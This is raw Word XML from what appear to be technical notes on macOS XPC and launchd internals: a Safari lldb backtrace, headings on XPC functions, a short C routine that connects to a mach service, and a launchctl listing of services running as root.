    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #11: 0x00007fff91796677 HIToolbox`ReceiveNextEventCommon + 184</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #12: 0x00007fff917965af HIToolbox`_BlockUntilNextEventMatchingListInModeWithFilter + 71</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #13: 0x00007fff961870ee AppKit`_DPSNextEvent + 1067</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #14: 0x00007fff96553943 AppKit`-[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] + 454</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #15: 0x00007fff8fd9e37f Safari`-[BrowserApplication nextEventMatchingMask:untilDate:inMode:dequeue:] + 252</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #16: 0x00007fff9617cfc8 AppKit`-[NSApplication run] + 682</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #17: 0x00007fff960ff520 AppKit`NSApplicationMain + 1176</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #18: 0x00007fff913405ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    frame #19: 0x00007fff913405ad libdyld.dylib`start + 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D917D5">
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">(lldb) </w:t>
      </w:r>
    </w:p>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Default="00D917D5" w:rsidP="00D917D5"/>
    <w:p w:rsidR="00D917D5" w:rsidRPr="00D917D5" w:rsidRDefault="00D917D5" w:rsidP="00D917D5"/>
    <w:p w:rsidR="00B65EF6" w:rsidRDefault="00775D8D" w:rsidP="00775D8D">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="162" w:name="_Toc445313364"/>
      <w:r w:rsidRPr="00775D8D">
        <w:t>xpc_connection_set_event_handler</w:t>
      </w:r>
      <w:bookmarkEnd w:id="162"/>
    </w:p>
    <w:p w:rsidR="00775D8D" w:rsidRDefault="00775D8D" w:rsidP="00775D8D"/>
    <w:p w:rsidR="003249E6" w:rsidRDefault="006C7934" w:rsidP="006C7934">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="163" w:name="_Toc445313365"/>
      <w:r w:rsidRPr="006C7934">
        <w:t>_xpc_serializer_get_dispatch_mach_msg</w:t>
      </w:r>
      <w:bookmarkEnd w:id="163"/>
    </w:p>
    <w:p w:rsidR="006C7934" w:rsidRDefault="006C7934" w:rsidP="006C7934">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="164" w:name="_Toc445313366"/>
      <w:r w:rsidRPr="006C7934">
        <w:t>_xpc_TYPE_deserialize</w:t>
      </w:r>
      <w:bookmarkEnd w:id="164"/>
    </w:p>
    <w:p w:rsidR="006C7934" w:rsidRPr="006C7934" w:rsidRDefault="006C7934" w:rsidP="006C7934">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="165" w:name="_Toc445313367"/>
      <w:r w:rsidRPr="006C7934">
        <w:t>_xpc_object_create</w:t>
      </w:r>
      <w:bookmarkEnd w:id="165"/>
    </w:p>
    <w:p w:rsidR="006C7934" w:rsidRDefault="006C7934" w:rsidP="006C7934">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="60"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7934">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>_xpc_object_create(OBJC_CLASS* type,</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7934">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>uint32_t extra)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C7934" w:rsidRPr="006C7934" w:rsidRDefault="006C7934" w:rsidP="006C7934">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C7934">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>extra bytes to allocate</w:t>
      </w:r>
      <w:r w:rsidRPr="006C7934">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:br/>
        <w:t>for object fields</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003249E6" w:rsidRDefault="003249E6" w:rsidP="003249E6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="166" w:name="_Toc445313368"/>
      <w:r w:rsidRPr="003249E6">
        <w:lastRenderedPageBreak/>
        <w:t>launchd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> services</w:t>
      </w:r>
      <w:bookmarkEnd w:id="166"/>
    </w:p>
    <w:p w:rsidR="003249E6" w:rsidRPr="003249E6" w:rsidRDefault="003249E6" w:rsidP="00775D8D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="2"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">● </w:t>
      </w:r>
      <w:r w:rsidR="00063842">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t>pid 1</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>● launchd manages system services</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>● All processes can talk to launchd</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>● provides the mechanisms to look up system</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>services and connect to them</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
        <w:t>● system service == a send right to a mach port</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00063842">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">○ </w:t>
      </w:r>
      <w:r w:rsidR="00063842">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">launchd only cares about </w:t>
      </w:r>
      <w:r w:rsidR="00063842">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>the initial connection, not the</w:t>
      </w:r>
      <w:r w:rsidR="00063842">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="ArialMT" w:hAnsi="ArialMT"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>protocol</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003249E6" w:rsidRDefault="003249E6" w:rsidP="00775D8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>mach_port_t connect_to_service(const char* service_name) {</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>mach_port_t bs_port, service_port;</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>kern_return_t err;</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>task_get_bootstrap_port</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(mach_task_self(), &amp;bs_port);</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">err = </w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>bootstrap_look_up</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>(bs_port, service_name, &amp;service_port);</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>if (err == KERN_SUCCESS) {</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>return service_port;</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>} else {</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>return MACH_PORT_NULL;</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="003249E6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00063842" w:rsidRDefault="00063842" w:rsidP="00775D8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00063842" w:rsidP="00775D8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00063842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>bootstrap_check_in</w:t>
      </w:r>
      <w:r w:rsidRPr="00063842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>(bootstrap_port,</w:t>
      </w:r>
      <w:r w:rsidRPr="00063842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:br/>
        <w:t>“service_name”,</w:t>
      </w:r>
      <w:r w:rsidRPr="00063842">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:br/>
        <w:t>&amp;servicePort);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRDefault="00254B45" w:rsidP="00DD2986">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="167" w:name="_Toc445313369"/>
      <w:r w:rsidR="00DD2986">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Root Service</w:t>
      </w:r>
      <w:bookmarkEnd w:id="167"/>
      <w:r w:rsidR="00DD2986">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>nokia-lumia-820:~ root1$ launchctl  print system | grep "       0      "</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uninstall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oredownloadd.daem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pmux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is.ypbin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Kerberos.digest-servic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kcproxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      0 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.CoreRAI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TrustEvaluationAgent.system</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newsyslog</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utomoun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vix.cr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oreagent.daem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emoteDesktop.PrivilegeProx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tm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R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busertrampolin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GSSCre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vbdevice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org.macosforge.xquartz.privileged_startx</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xpc.sm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ystemstats.analysis</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nstallandsetup.systemmigration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gkreport</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FontWork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eapolcfg_auth</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oreservices.appleid.passwordcheck</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pplessdstatistics</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gssd.DE000000-A086-0100-0000-000000000000</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updateEFIDesktopPictur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ystem_installd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.sysdiagnos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orageki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etadata.mds.spindump</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Kerberos.kpasswd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hdiejec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olorsync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backup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org.postfix.mast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fontmov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vdplayback.setregi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irport.wps</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ssetCacheLocatorServic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wifi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UserNotificationCent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torereceiptinstall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nfsconf</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etauth.sys.auth</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srpc.wkssvc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.log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DumpPanic</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wacs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BooksX-SecureUserDefaults</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ystemadministration.writeconfig</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vsdbutil</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fsd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.configureLocalKDC</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k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ppleseed.fbahelper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peech.speechsynthesis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f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lock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IFCStar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emond.aslmanag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xpc.uscwoap</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wwan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pcbin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rinttool.daem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owerd.sw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etworkDiagnostics</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anagedClien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kdump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fon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emon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ystemkeychai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ecurity.agent.logi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ecurity.authhos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oftwareupdate_download_service</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pfctl</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lc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dmclient.daemon</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.mbsystemadministrati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logkextloads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hidfu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CommCenterRoot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bluetoothReport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irplaydiagnostics.server.mac</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ucupdate.plist</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ystemstats.dail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etauth.sys.gui</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anagedClient.enrol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gss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esktopServices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artupdisk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C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eriodic-weekl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etworkSharing</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srpc.mdssvc</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DNSResponderHelper.reloade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p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bluetoothaudio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fpfs_checkafp</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baidu.netdiskmac.BDYunFinderInstall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tatd.notif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creensharing</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ootless.init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DD2986" w:rsidRPr="00DD2986" w:rsidRDefault="00DD2986" w:rsidP="00DD2986">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">       0      - </w:t>
      </w:r>
      <w:r w:rsidRPr="00DD2986">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>com.apple.preferences.timezone.admintool</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eriodic-monthl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surlstorage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findmymacmesseng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orestorage.corestoragehelper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dobe.fpsau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trust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ReportCrash.Roo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oticeboard.stat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loginwindow.LFVTrac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fpfs_afpLoa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ppleFileServ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ecurity.agent.login.00000000-0000-0000-0000-0000000186A8</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gluetools.chmod_bpf</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var-db-dslocal-backup</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ystempreferences.instal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platform.ptm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nesessionmanag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an